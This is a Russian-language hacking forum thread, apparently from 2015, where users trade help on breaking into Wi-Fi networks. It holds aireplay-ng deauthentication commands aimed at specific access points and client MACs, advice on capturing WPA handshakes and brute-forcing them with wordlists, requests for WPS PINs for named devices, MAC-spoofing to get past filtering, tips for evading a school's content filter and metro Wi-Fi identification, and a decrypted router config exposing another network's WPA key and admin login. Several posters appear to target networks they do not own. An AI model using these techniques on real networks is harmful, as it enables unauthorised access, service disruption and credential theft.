root@kali-Linux:~# aircrack-ng /root/h12.pcap -w /root/wordlist.txt
Opening /root/h12.pcap
Read 6 packets.
# BSSID ESSID Encryption
1 F8:C0:91:14:07:03 akado751 WPA (0 handshake)
Choosing first network as target.
Opening /root/h12.pcap
No valid WPA handshakes found..
Quitting aircrack-ng...
то ни как ни чего не получается
Панельная антенна, это одна из разновидностей направленных антенн. Антенну можно сделать просто и легко, главное постараться, ну если руки совсем не пригодны для напильника, то можно и купить антенну. Панельки для нашего дела отлично подходят.
Не плохо себя зарекомендовала панельная антенна FA-20, чертежи которой можно найти в интернете.
Василий-Шишкин
14.05.2015, 00:15
Не плохо себя зарекомендовала панельная антенна FA-20, чертежи которой можно найти в интернете.
Спачибо, гляну.
Подойдут аппараты от Ubiquity например Bullet M2 (придется шить под OpenWRT). Но utp кабель ограничен по затуханию сигнала 100 метрами.
Можете как альтернативу рассмотреть активный usb кабель, но длинна конечно тоже не на 300 м.
Все же выходит бюджетнее, практичнее и меньше потерь, чем в коаксиальном кабеле.
Спачибо, гляну.
Если будут проблемы с поиском чертежей или с изготовлением, сообщи я с разрешения модераторов выложу.
Еще можно присмотреться к TP-Link WA5210G и TP-Link WA7510N, их кстати можно перепрошить в Ubiquit. Вот только питание по витой паре на 200-300 метров тоже проблемно, так как напряжение упадет ниже плинтуса, нужно тянуть витую пару а коробку power of ethernet ставить уже перед самой крышей(точкой доступа).
Это все же не то решение, Вы предлагаете мне поставить программы airodump-ng и т.п. на память роутера и с помощью удаленки заходить на него. Но мне нужно решение, чтобы такое устройство, при подключении к компьютеру определялось в kali непосредственно как wlan.
Василий-Шишкин
14.05.2015, 13:44
Добрый день.
Нарисовалась следующая проблема, везде, где я читал про перехват хендшейка, пишется [ 0 l 12 ACKs ], а у меня 0 l 0: вот сайт о котором я говорил а вот что показывает у меня :
root@kali-Linux:~# aireplay-ng --deauth 100 -a 00:0E:8F:64:40:92 -c D4:8F:33:BB:82:68 --ignore-negative-one mon0
12:42:50 Waiting for beacon frame (BSSID: 00:0E:8F:64:40:92) on channel -1
12:42:50 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:51 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:51 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:52 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:53 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:53 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:54 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:55 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:55 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
^C
думаю из за этого не могу перехватить хендшейк, как это исправить?
Заранее благодарен
CRACK211
14.05.2015, 13:58
Здравствуйте. подскажите пожалуйста можно ли как то сделать так чтоб после загрузки с флешки о добавления программ и настроек они сохранялись после завершения работы?
Добрый день.
Нарисовалась следующая проблема, везде, где я читал про перехват хендшейка, пишется [ 0 l 12 ACKs ], а у меня 0 l 0: вот сайт о котором я говорил а вот что показывает у меня :
root@kali-Linux:~# aireplay-ng --deauth 100 -a 00:0E:8F:64:40:92 -c D4:8F:33:BB:82:68 --ignore-negative-one mon0
12:42:50 Waiting for beacon frame (BSSID: 00:0E:8F:64:40:92) on channel -1
12:42:50 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:51 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:51 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:52 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:53 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:53 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:54 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:55 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
12:42:55 Sending 64 directed DeAuth. STMAC: [D4:8F:33:BB:82:68] [ 0| 0 ACKs]
^C
думаю из за этого не могу перехватить хендшейк, как это исправить?
Заранее благодарен
Слабый уровень сигнала от точки доступа/клиента. Пакеты деаутотификации и ответы не доходят. Надо пробовать ближе, либо ставить направленные антенны.
Василий-Шишкин
14.05.2015, 17:08
Слабый уровень сигнала от точки доступа/клиента. Пакеты деаутотификации и ответы не доходят. Надо пробовать ближе, либо ставить направленные антенны.
Хорошо поробую как-то приблизиться, ведь антену я уже использую.
А что вообще обозначают эти числа [ 0 l 0 ACKs ] ?
Это все же не то решение, Вы предлагаете мне поставить программы airodump-ng и т.п. на память роутера и с помощью удаленки заходить на него. Но мне нужно решение, чтобы такое устройство, при подключении к компьютеру определялось в kali непосредственно как wlan.
А в чем проблемма перепрошить устройство в ddwrt и работать с программами по ssh???
Не плохо себя зарекомендовала панельная антенна FA-20, чертежи которой можно найти в интернете.
FA-20 Отличая антенна для построения линков, да и вардрайвить ей из мягкого кресла расположенного дома в высотке с большим покрытием одно удовольствие, но вот тащить это корыто на выезд это уже явный перебор, тут гораздо лучше "50-ти омный патч v. 3.0" гуглиться отлично.
CRACK211
17.05.2015, 01:49
Здравствуйте. Подскажите пожалуйста есть сеть с wep шифрованием. Пароль к сети я узнал но вот подключится не могу на компьютере пишет не удалось подключится а на планшете ios пишет не верный пароль. Что можно сделать для подключения к этой сети?
Здравствуйте. Подскажите пожалуйста есть сеть с wep шифрованием. Пароль к сети я узнал но вот подключится не могу на компьютере пишет не удалось подключится а на планшете ios пишет не верный пароль. Что можно сделать для подключения к этой сети?
Используй airodump-ng посмотри какие mac адреса у клиентов этой сети, склонируй свой мак адрес на мак адрес клинта и попробуй подключиться. Возможно стоит фильтр по мак адресам.
Еще может быть или статические ip в сетке или динамические попробуй подключение с разными настройками.
Ну или сигнал плохой, тогда антенна или подойти поближе.
А подскажите какую-нибудь хорошую модель внутреннего PCI (не express!) wifi-адаптера сравнимого с тем же awus036h ? У последнего для usb-свистка хорошая чувствительность, но дисконекты время от времени уже надоели
Добрый день!
Есть D-Link DIR-825 B1/2.05WW. Работал без проблем. Установлен режим Wi-Fi "802.11N only". Снял галочку с WMM и сохранил конфигурацию. После этого перестал соединяться с маршрутизатором через Wi-Fi. Через Ethernet доступа пока нет. Ключ WPA2 AES и пароль админки известны, естественно. Теперь понимаю, что нужно было разрешить администрирование через WAN. Но, теперь-то уж что - чего нет, того нет. Может, есть возможность обойти запрет удалённого администрирования?
Перепробовал все режимы безопасности соединения. Пробовал менять настройки Wi-Fi-адаптера в ноутбуке. Кто знает, есть ли какие-то особые настройки с помощью которых можно пройти аутентификацию в режиме 802.11N и выключенным WMM?
Vikhedgehog
21.05.2015, 14:16
Опять нужна помощь с расшифровкой конфига ZYXEL P330 EE.
SSID: local
Нужен ключ WPA.
http://rghost.ru/private/8H2VLFGbV/40e4f825a926e5d29c2d662fba1f84b2
Благодарю.
<skip>
Перепробовал все режимы безопасности соединения. Пробовал менять настройки Wi-Fi-адаптера в ноутбуке. Кто знает, есть ли какие-то особые настройки с помощью которых можно пройти аутентификацию в режиме 802.11N и выключенным WMM?
Сам спросил, сам ответил. Удалось подключиться только с помощью смарта Sony на Android. Есть такое подозрение, что для устройств на Android вообще отключение WMM не является препятствием.
Опять нужна помощь с расшифровкой конфига ZYXEL P330 EE.
SSID: local
Нужен ключ WPA.
http://rghost.ru/private/8H2VLFGbV/40e4f825a926e5d29c2d662fba1f84b2
Благодарю.
возможно workwork
t§"À¨
ˬ
!ˬ
A
C
r
P-330W EE
admin
1234
local
*
+
d
u0
workwork
5
Q
$
REALTEK_EASY_CONFIG
ZyXEL
!
,
P
video 80
@
video 8000
=
x¬
¬
x
-3 2
¸1
Quick Time 4
:
W
Dialpad
Paltalk
Battle.net
host.dyndns.org
2
ZYXELRUS
1
Stalker5
21.05.2015, 23:29
Какие ПИНЫ можно попробовать к точке с таким MAC-адресом : F0:7D:68:91:5B:C8 ? Название точки D-link
Vikhedgehog
22.05.2015, 18:58
В московском метро чтобы пользоваться вайфаем теперь обязательно нужно указывать номер телефона (http://login.wi-fi.ru/am/UI/Login). Есть ли какой-то способ пропускания идентификации как в старые добрые времена?
Ребят, помогите. Есть роутер tp-link tl-wr720n. Задача расшарить на него интернет со второго роутера zte zxhn h208n на котором интернет настроен через pppoe-соединение (byfly). Два девайса соединены сетевыми кабелями друг с другом, что настраивать в tp-link'е чтобы на нём появился интернет? Пробовал прописывать в нём pppoe, но нифига. На ZTE желательно ничего не изменять т.к роутер не мой.
Ребят, помогите. Есть роутер tp-link tl-wr720n. Задача расшарить на него интернет со второго роутера zte zxhn h208n на котором интернет настроен через pppoe-соединение (byfly). Два девайса соединены сетевыми кабелями друг с другом, что настраивать в tp-link'е чтобы на нём появился интернет? Пробовал прописывать в нём pppoe, но нифига. На ZTE желательно ничего не изменять т.к роутер не мой.
Если ip статические, просто пропиши что шлюз (gateway) - ip роутера с интернетом и поставь у себя ip той же подсети что и в роутере с инетеом.... и твой tp-lik будет раздовать инет.
Если ip статические
У нас провайдеры давно не выдают пользователям статические ip.
VladimirV
22.05.2015, 22:56
Ребят, помогите. Есть роутер tp-link tl-wr720n. Задача расшарить на него интернет со второго роутера zte zxhn h208n на котором интернет настроен через pppoe-соединение (byfly). Два девайса соединены сетевыми кабелями друг с другом, что настраивать в tp-link'е чтобы на нём появился интернет? Пробовал прописывать в нём pppoe, но нифига. На ZTE желательно ничего не изменять т.к роутер не мой.
В zte ничего не трогаем, только узнаем настройки DHCP LAN.
В Tplink в настройках WAN ставим DHCP. В настройках LAN если на zte раздача DHCP 192.168.1.1 то 192.168.2.1
Соединяете из LAN zte в WAN Tp-link.
В zte ничего не трогаем, только узнаем настройки DHCP LAN.
В Tplink в настройках WAN ставить DHCP. В настройках LAN если на zte раздача DHCP 192.168.1.1 то 192.168.2.1
Соединяете из LAN zte в WAN Tp-link.
Ничего не понял. В WAN никакого DHCP нет
http://s020.radikal.ru/i708/1505/05/83541fcc7b83t.jpg
или это в Static IP прописывать? Или в LAN менять, а WAN Dinamic IP оставить?
VladimirV
22.05.2015, 23:54
Ничего не понял. В WAN никакого DHCP нет
http://s020.radikal.ru/i708/1505/05/83541fcc7b83t.jpg
или это в Static IP прописывать? Или в LAN менять, а WAN Dinamic IP оставить?
Dynamic IP - Это и есть получать IP по DHCP.
Dynamic IP
Понял. То есть как я понимаю всё настройка сводится к тому, чтобы прописать вместо 192.168.1.1 - 192.168.2.1.
VladimirV
22.05.2015, 23:58
Понял. То есть как я понимаю всё настройка сводится к тому, чтобы прописать вместо 192.168.1.1 - 192.168.2.1.
Это делать необходимо в настройках лан.
Покажите настройки DHCP zte
Это делать необходимо в настройках лан.
Покажите настройки DHCP zte
Вроде было 192.168.1.1. Точно не помню, роутер не мой. Завтра попробую, отпишусь о результатах. Нжно увеличивать третью цифру после точки на единицу?
VladimirV
23.05.2015, 00:05
Вроде было 192.168.1.1. Точно не помню, роутер не мой. Завтра попробую, отпишусь о результатах. Нжно увеличивать третью цифру после точки на единицу?
Тогда в Tplink ставьте в настройках NETWORK - LAN ставьте - 192.168.2.1
Тогда в Tplink ставьте в настройках NETWORK - LAN ставьте - 192.168.2.1
А это всё будет работать именно "по-воздуху" т.е без физического соединения роутеров с сетевой картой на ноутбуке?
VladimirV
23.05.2015, 00:16
А это всё будет работать именно "по-воздуху" т.е без физического соединения роутеров с сетевой картой на ноутбуке?
Ну Вы даете или я.
Вы писали: Два девайса соединены сетевыми кабелями друг с другом
WiFi на Tplink будет работать
Ну Вы даете или я.
Вы писали: Два девайса соединены сетевыми кабелями друг с другом
Ну, я имею ввиду, что стоят два роутера, один подключен к телефонной розетке, а другой кабелем в LAN1-порт первого роутера. С ноутбуком их соединять по сетевой карте ведь не нужно будет? Всё должно работать по Wifi. Цель отнести второй роутер подальше от первого чтобы пользоваться интернетом там куда первый роутер не добивает.
Дорогие товарищи подскажите, хочу опубликовать файл в теме перебора паролей, там сказано загрузить
*.cap файл а у меня *.ivs мне кажется этоодно и тотоже. Кто нибуть подтвердит мои догадки?
Дорогие товарищи подскажите, хочу опубликовать файл в теме перебора паролей, там сказано загрузить
*.cap файл а у меня *.ivs мне кажется этоодно и тотоже. Кто нибуть подтвердит мои догадки?
*.ivs это файлы для сетей wep шифрования, для расшифровки wpa/wpa2 они не подойдут. Ловите хендшейк и выкладывайте *.cap файл.
Ещё вапрос, а если я в wpa/wpa2 поймал рукопожатие в *.ivs (как ваше сказано wep) это как понимать?
Добрый вечер! На днях обновил Kali на своем нетбуке и получил новую версию утилиты airmon-ng. В результате получил кучю не рабочих скриптов из за изменения имени типа mon0wlan0. Пришлось заменить новый скрипт /usr/sbin/airmon-ng старым скриптом из комплекта SET по пути /usr/share/set/src/wireless/airmon-ng. На оф. форуме Кали как я понял тоже много не довольных.
Ещё вапрос, а если я в wpa/wpa2 поймал рукопожатие в *.ivs (как ваше сказано wep) это как понимать?
Считайте, что вы ничего не поймали . В файле должен быть beacon - пакет и 4-е ключевых EAPOL пакета. В *.ivs ничего этого нет. Рекомендую к прочтению: http://forum.antichat.ru/threads/309017/
roman921
26.05.2015, 14:53
Ребят, посоветуйте словари хорошие для брута впа. Если точка не пробивается на 8 циф и мобильные телефоны, какие словари к ней лучше применить ?
Ребят, посоветуйте словари хорошие для брута впа. Если точка не пробивается на 8 циф и мобильные телефоны, какие словари к ней лучше применить ?
Словари в этой теме: http://forum.antichat.ru/threads/281655/
Самый пробивной InsidePro.
roman921
26.05.2015, 20:59
Словари в этой теме: http://forum.antichat.ru/threads/281655/
А можно эту тему как-то упорядочить ? И в шапку вынести наиболее популярные, как там и написано.
Silverlite
27.05.2015, 16:15
Поддерживаю, но думаю ссылки быстро устаревать будут.
roman921
28.05.2015, 01:35
Надо чтобы словари залили в давнлоад сайта или на яндекс диск администратора сайта, тогда ссылки будут работать долго.
foetopsy
28.05.2015, 11:46
забросил перебор а щас понадобилось так вот установил Hashcat а дрова то у меня каталист 14.12 omega выдает конечно же ошибку требует актуальный драйвер!где найти старый я не знаю,у меня был но чудесным образом пропал может есть у кого Catalyst 14.9 !?
забросил перебор а щас понадобилось так вот установил Hashcat а дрова то у меня каталист 14.12 omega выдает конечно же ошибку требует актуальный драйвер!где найти старый я не знаю,у меня был но чудесным образом пропал может есть у кого Catalyst 14.9 !?
Под свою конфигурацию использую эти: http://dropmefiles.com/rJjzS. Пробуй.
Alexei19
28.05.2015, 14:18
Добрый день! Подключился к Wi-Fi местного учеб. заведения, а там стоит фильтр Skydns Открывается очень ограниченное число сайтов на Win 7. Но вчера получилось скачать ок. 7 гиг. (накидал ссылок в качалку используя свой и-нет канал, потом подключил инет уч. зав. и качал). Сегодня этот метод не работает. Пробовал с андроид смарта, вроде сайты открываются, но сигнал слабый (точка в 500 м. от меня). Сайты анонимайзеры не помогают. Как-бы всё это запустить из под Windows минуя эти фильтры?
Скажите, кто-нибудь такой программой пользовался:. По функционалу похожа на intercepter-ng, с переработанным интерфейсом. А вот её wi-fi monitor очень напоминает WifiChannelMonitor от NirSoft. Можно искать по городу потерянные или украденные телефоны и планшеты.Мужик все о чем тут пишут взял и запатентовал. Было бы интересно пощупать программку. Может у кого есть триал-версия?
Какой может быть пин для E8:FC:AF:9A:88:C8 NETGEAR,а то лочится постояно?
Спасибо.
Vikhedgehog
31.05.2015, 02:38
Какой может быть пин для E8:FC:AF:9A:88:C8 NETGEAR,а то лочится постояно?
Спасибо.
Если SSID стандартный (NETGEARXX), то можно попробоваиь ломануть словарем. Помню раньше его где-то на буржуйских сайтах выкладывали.
Vikhedgehog
31.05.2015, 02:46
Кто-нибудь знает как брутить XOR файлы с keystream от WEP? Накопил за многие годы 64 bit xorы от невзломанных веп сетей (xor перехватывается при выполнении KoreK или Frag атаки), до конца взламывать все сети видимо не было времени, а они все дружно поисчезали. Теперь вот интересно узнать какие пароли были, ведь зачастую хозяева на новых роутерах ставят те же пароли, а сбрутить их через handshake гораздо сложнее.
tr1ckyBiT
31.05.2015, 06:24
Кто-нибудь знает как брутить XOR файлы с keystream от WEP? Накопил за многие годы 64 bit xorы от невзломанных веп сетей
Можно попробовать тулсы wepdecrуpt/wepattack/weplab, если есть хотя бы один data-пакет. Они используют активную атаку по словарю совместно с полным брутом, и если на точке стоял 64-битный ASCII или md5 key gen ключ то его можно с высокой вероятностью восстановить, а если 128-битный то нужно иметь его в словаре.
Vikhedgehog
31.05.2015, 12:38
Можно попробовать тулсы wepdecrуpt/wepattack/weplab, если есть хотя бы один data-пакет. Они используют активную атаку по словарю совместно с полным брутом, и если на точке стоял 64-битный ASCII или md5 key gen ключ то его можно с высокой вероятностью восстановить, а если 128-битный то нужно иметь его в словаре.
А если создать свой дата пакет при помощи packetforge-ng и keystream от wep точки, то его сбрутить удастся? Или нужно обязательно чтоб пакет был перехвачен с airodump-ng?
tr1ckyBiT
31.05.2015, 21:32
Я думаю это легко проверить на своей точке, поставьте на нее простейший wep-ключ, запустите против точки chop-chop/frag attack, остановите ее после получения кистрим, а дальше по предложенному вами методу.
Здравствуйте товарищи!
Кто юзал airslax5 вроде удобная вещь.
У меня что то она никак не стаыиться на
Vmware. Только 3.2 верстя работает на виртуальной машине и и прикол,надо выбрать в настройках в место Os Linux, OS windows!
какой то бессмысленный ответ. я же сказал, как быть с нетворк менеджером, если его убить то интернет не работает
какой то бессмысленный ответ. я же сказал, как быть с нетворк менеджером, если его убить то интернет не работает
Извини по думал ты любитель mon0
Народ нашёл дистрибутив хороший airSlax5 немогу поставить на Vmware, кто поможет?! 
foetopsy
02.06.2015, 19:18
Под свою конфигурацию использую эти: http://dropmefiles.com/rJjzS. Пробуй.
спасибо!кстате нашел на пендоском сайте!у меня беда с трафиком дома скачаю на работе)
Поставил только airslax 3.2 на vmware. Только 3.2 старье хочется 5. Кто ставил?
https://app.box.com/s/z3dpzoawu8pu57ul3ep8wgpxv552xfzi
Вот это меню!
Здравствуйте пользователи Antechat.ru!
Прошу помогите в решении проблемы с уязвимостью WPA.
19:44:57 Waiting for beacon frame (BSSID: 3C:19:7D:A0:A6:0D) on channel -1
19:44:57 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Мой процесс действий!
1) sudo airmon-ng start wln0
2) sudo airodump-ng --encrypt wpa mon0
3) sudo airodump-ng -w bum -c 7 --bssid 3C:19:7D:A0:A6:0D mon0
4) sudo aireplay-ng -0 1 -a 3C:19:7D:A0:A6:0D -c 68:5D:43:BC:82:A7 mon0 - После этой команды столкнулся с проблемой.
В заранее огромное СПАСИБО!
Добрый день!
Кто-нибудь подскажет, есть ли в природе программа для брута, которая может использовать ускорение видеокарты Intel HD Graphics 4000?
Добрый день!
Кто-нибудь подскажет, есть ли в природе программа для брута, которая может использовать ускорение видеокарты Intel HD Graphics 4000?
Нет такой программы. Брут работает только на AMD/Nvidia архитектуре.
Здравствуйте пользователи Antechat.ru!
Прошу помогите в решении проблемы с уязвимостью WPA.
19:44:57 Waiting for beacon frame (BSSID: 3C:19:7D:A0:A6:0D) on channel -1
19:44:57 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Мой процесс действий!
1) sudo airmon-ng start wln0
2) sudo airodump-ng --encrypt wpa mon0
3) sudo airodump-ng -w bum -c 7 --bssid 3C:19:7D:A0:A6:0D mon0
4) sudo aireplay-ng -0 1 -a 3C:19:7D:A0:A6:0D -c 68:5D:43:BC:82:A7 mon0 - После этой команды столкнулся с проблемой.
В заранее огромное СПАСИБО!
используйте --ignore-negative-one для того, чтоб избежать минус первого канала
sudo aireplay-ng -0 1 -a 3C:19:7D:A0:A6:0D -c 68:5D:43:BC:82:A7 mon0 --ignore-negative-one
об этой ошибке и ее фиксе тут писалось и не раз
используйте --ignore-negative-one для того, чтоб избежать минус первого канала
sudo aireplay-ng -0 1 -a 3C:19:7D:A0:A6:0D -c 68:5D:43:BC:82:A7 mon0 --ignore-negative-one
об этой ошибке и ее фиксе тут писалось и не раз
Огромное вам СПАСИБО. Наконец то сдвинулся с мертвой точки)
Добрый день.Вопрос такого плана... Нашел точку "roma", словил хендшейк. Сбрутил пароль roma280288. Но подключиться не могу. Подозреваю что еще идет фильтрация по мак адресу.Под Вин7 не получается подменить нужный мак. В airslax5.4 в свойстве соединения прописываю мак адрес клиента, и тоже не соединяется. Где еще может быть загвоздка?
Добрый день.Вопрос такого плана... Нашел точку "roma", словил хендшейк. Сбрутил пароль roma280288. Но подключиться не могу. Подозреваю что еще идет фильтрация по мак адресу.Под Вин7 не получается подменить нужный мак. В airslax5.4 в свойстве соединения прописываю мак адрес клиента, и тоже не соединяется. Где еще может быть загвоздка?
Есть много софта для замены мака для вин7 (Technitium MAC Address Changer и т.д.) В кали линуксе через команду macchanger в терминале.
Silverlite
11.06.2015, 12:48
Может глупый вопрос, но не могу найти ответа. Возможно ли конвертировать wpa/wpa2 хэш на MD5 или какой-нибудь другой? А то этот wpa сравнительно медленнее перебирается.
binarymaster
11.06.2015, 23:15
Может глупый вопрос, но не могу найти ответа. Возможно ли конвертировать wpa/wpa2 хэш на MD5 или какой-нибудь другой? А то этот wpa сравнительно медленнее перебирается.
Невозможно. Если бы было возможно, этот тип хешей не использовался бы для аутентификации WPA/WPA2.
Есть много софта для замены мака для вин7 (Technitium MAC Address Changer и т.д.) В кали линуксе через команду macchanger в терминале.
Под виндой меняется только в определенном диапазоне, а под линуксом с загрузочной флешки аирслакс меняю в терминале,проверяю что изменился,пытаюсь присоединится к выбранной сети,ввожу пароль....Не присоединяется и макадрес сбрасывается опять на заводской.Какой-то полтергейст.Уже интересно стало ,есть ли кроме пароля и фильтрации по маку,другие способы защиты?
Кт-нибудь знает как на роутере Huawei HG552f-11 задать принудильно канал вещания? Эта гадость постоянно лезет на 11.
В темах по подбору паролей просят отправить:
1. ESSID: - название роутера (в смысле сетевое имя а не модель)
2. BSSID: - MAC адрес роутера
3. файл .cap который содержит хендшейк.
Вопрос в том как этот файл получить? и можно-ли вместо файла сам хендшейк отправить (нечто вроде: A0:21:B7:A0:71:3C)?
binarymaster
15.06.2015, 13:16
Вопрос в том как этот файл получить? и можно-ли вместо файла сам хендшейк отправить (нечто вроде: A0:21:B7:A0:71:3C)?
Хендшейк - это последовательность пакетов данных, которыми обмениваются клиент и точка доступа при авторизации. Файл в формате pcap записывается при помощи airodump-ng, в котором будут содержаться пакеты.
Ваша задача - поймать хендшейк, записывая пакеты в прямом эфире. Можно либо дождаться авторизации клиента, либо специально спровоцировать точку с клиентом, отправив пакет деавторизации.
Советую почитать статью:
https://cryptoworld.su/wifi-wpa-hack/
Хендшейк - это последовательность пакетов данных, которыми обмениваются клиент и точка доступа при авторизации. Файл в формате pcap записывается при помощи airodump-ng, в котором будут содержаться пакеты.
Ваша задача - поймать хендшейк, записывая пакеты в прямом эфире. Можно либо дождаться авторизации клиента, либо специально спровоцировать точку с клиентом, отправив пакет деавторизации.
Советую почитать статью:
https://cryptoworld.su/wifi-wpa-hack/
Спасибо, сейчас почитаю, но вопрос вдогонку, а можно-ли сразу(одновременно) от нескольких роутеров отлавливать хендшейки? если да то они будут в разные файлы писаться или в один?
Посоветуйте железо для вардрайвинга:
что лучше выбрать Ralink 3070 или Realtek RTL8187L ?
что лучше выбрать одна длинная антенна 2000MW или две средних 3000MW ?
Не сочтите за рекламу если можно спрошу со ссылками на конкретные товары в магазине, вот я выбрал 4 устройства и думаю что из них выбрать:
2015 USB 2.0 Wireless network card BT-N9100 Beini free internet High Power 3000mW Dual Antenna Wifi Ralink 3070
http://www.aliexpress.com/item/USB-...ernet-High-Power-3000mW-Dual/32320936299.html
1127 ALFA NETWORK AWUS036H 1W 1000mW Wireless G USB Adapter v5 REALTEK RTL8187L + Mount
http://www.aliexpress.com/item/1127...er-v5-REALTEK-RTL8187L-Mount/32215848651.html
2015 Hot USB Wifi Adapter Free WiFi Receiver LAN Wireless Network Internet Card Ralink 3070 High Power Speed 2000MW + CD Beini
http://www.aliexpress.com/item/2015...ternet-Card-Ralink-3070-High/32324937378.html
Comfast High Power RTL8187L 54Mbps 13dBi Antenna Wireless WiFi Adapter with 1.2m usb cable line wifi dongle
http://www.aliexpress.com/item/High...pter-with-1-2m-usb-cable-line/1708702407.html
я склоняюсь к 1й ссылке, т.к. 2015, 3000mW, Ralink 3070. на Ralink 3070 вижу много выходит адаптеров последнее время и думаю он наверное лучше? а изначально думал что 1 длинная антенна лучше? альфа - китайская.
Помогите с выбором плс.
binarymaster
15.06.2015, 20:23
Спасибо, сейчас почитаю, но вопрос вдогонку, а можно-ли сразу(одновременно) от нескольких роутеров отлавливать хендшейки? если да то они будут в разные файлы писаться или в один?
Да, можно, если роутеры работают на одном канале. Можно запустить несколько копий airodump-ng с разными параметрами, задав разные имена файлов и правила фильтрации.
Но всё-таки лучше работать с ними по очереди, так зачастую эффективнее.
Такой вопрос. Есть открытая АР, DSL_2640NRU, соединяюсь, Win показывает - без доступа к Интернету. Была мысль зайти в роутер и там пошаманить. Захожу 192.168.1.1 но дефолтные пароли не проходят. Пытался прогой RouterScan прогнать по IP адресам, найденным для моего города - без результата.
Можно ли еще что-нибудь придумать ?
henri2002
16.06.2015, 00:15
я склоняюсь к 1й ссылке, т.к. 2015, 3000mW, Ralink 3070
не верьте в такие мощностя.
не верьте в такие мощностя.
Да я вобще не очень верю китайцам, но а что в итоге выбрать из тех 4х вариантов что лучше выбрать?
Посоветуйте железо для вардрайвинга:
что лучше выбрать Ralink 3070 или Realtek RTL8187L ?
что лучше выбрать одна длинная антенна 2000MW или две средних 3000MW ?
Не сочтите за рекламу если можно спрошу со ссылками на конкретные товары в магазине, вот я выбрал 4 устройства и думаю что из них выбрать:
2015 USB 2.0 Wireless network card BT-N9100 Beini free internet High Power 3000mW Dual Antenna Wifi Ralink 3070
http://www.aliexpress.com/item/USB-...ernet-High-Power-3000mW-Dual/32320936299.html
1127 ALFA NETWORK AWUS036H 1W 1000mW Wireless G USB Adapter v5 REALTEK RTL8187L + Mount
http://www.aliexpress.com/item/1127...er-v5-REALTEK-RTL8187L-Mount/32215848651.html
2015 Hot USB Wifi Adapter Free WiFi Receiver LAN Wireless Network Internet Card Ralink 3070 High Power Speed 2000MW + CD Beini
http://www.aliexpress.com/item/2015...ternet-Card-Ralink-3070-High/32324937378.html
Comfast High Power RTL8187L 54Mbps 13dBi Antenna Wireless WiFi Adapter with 1.2m usb cable line wifi dongle
http://www.aliexpress.com/item/High...pter-with-1-2m-usb-cable-line/1708702407.html
я склоняюсь к 1й ссылке, т.к. 2015, 3000mW, Ralink 3070. на Ralink 3070 вижу много выходит адаптеров последнее время и думаю он наверное лучше? а изначально думал что 1 длинная антенна лучше? альфа - китайская.
Помогите с выбором плс.
Вам сюда http://forum.antichat.ru/threads/57249/page-50 . Лучше возьмите то , что уже проверено годами например : tp-link 7200nd - дешево и сердито !
Вам сюда http://forum.antichat.ru/threads/57249/page-50 . Лучше возьмите то , что уже проверено годами например : tp-link 7200nd - дешево и сердито !
Спасибо буду иметь ввиду tp-link 7200nd, но по моим вопросам может кто-нить ответить и про выбор чипа и про антенну(ы) и про то какой из этих 4х адаптеров будет получше?
Ну блин, тут есть вобще кто живой?
Ответтье хоть кто нибудь:
Посоветуйте железо для вардрайвинга:
что лучше выбрать Ralink 3070 или Realtek RTL8187L ?
что лучше выбрать одна длинная антенна 2000MW или две средних 3000MW ?
(даже если антенны с не реальными характеристиками, то что лучше 1 длинная или 2 средних по длине?)
Ну блин, тут есть вобще кто живой?
Ответтье хоть кто нибудь:
Посоветуйте железо для вардрайвинга:
( то что лучше 1 длинная или 2 средних по длине?)
Что лучше 1 рубль или 2 по 50 коп ?))
Посоветуйте железо для вардрайвинга:
2015 USB 2.0 Wireless network card BT-N9100 Beini free internet High Power 3000mW Dual Antenna Wifi Ralink 3070
Китайский ширпотреб, не будет у него мощность 3000mW. Недавно на xaker.name обсуждалось обходить этот aliexpress, много подделок.
Что лучше 1 рубль или 2 по 50 коп ?)) - не думаю что применительно к антеннам такое можно сказать.
Китайский ширпотреб, не будет у него мощность 3000mW. Недавно на xaker.name обсуждалось обходить этот aliexpress, много подделок. - Да я понимаю что китайцы любят приврать и ссылки на aliexpress я привел чтобы примерно понять что мне лучше выбрать, там или в другом месте брать это уже вопрос другой, для начала надо понять что вобще брать? на каком чипе адаптер брать? и с какими антеннами? а уже потом буду искать где взять.
К вопросу о WARNING Detected AP rate limiting, waiting 60 s
Нашёл такое видео: https://cloud.mail.ru/public/89uV/odSZyax5r.
Может кто пробовал такое решение? Суть в том что ломают заблокированную точку с WPS.
для начала надо понять что вобще брать? на каком чипе адаптер брать? и с какими антеннами? а уже потом буду искать где взять.
Возьми адаптер на RTL8187, выбирай из моделей которые себя зарекомендовали. Мне хватает прикупленной всенаправленной антенны Alfa 9dbi, точек много рядом.
Вопросы, с адаптерами нужно в этой теме задавать.
http://forum.antichat.ru/threads/57249/
